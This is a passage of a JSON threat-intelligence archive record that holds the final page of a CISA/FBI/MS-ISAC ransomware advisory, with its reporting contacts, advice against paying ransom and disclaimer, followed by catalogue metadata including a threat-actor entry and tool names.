actors\r\nBitcoin wallet information\r\nDecryptor files\r\nBenign sample of an encrypted file\r\nThe FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will\r\nbe recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage\r\nother criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of\r\nwhether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report\r\nransomware incidents to a local FBI Field Office or CISA at report@cisa.gov . State, local, tribal, and territorial\r\n(SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).\r\nDISCLAIMER\r\nThe information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the\r\nMS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to\r\nspecific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does\r\nnot constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.\r\nYour feedback is important. Please take a few minutes to share your opinions on this product through an\r\nanonymous Product Feedback Survey .\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a"
	],
	"report_names": [
		"aa23-075a"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434104,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.pdf",
		"text": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.txt",
		"img": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.jpg"
	}
}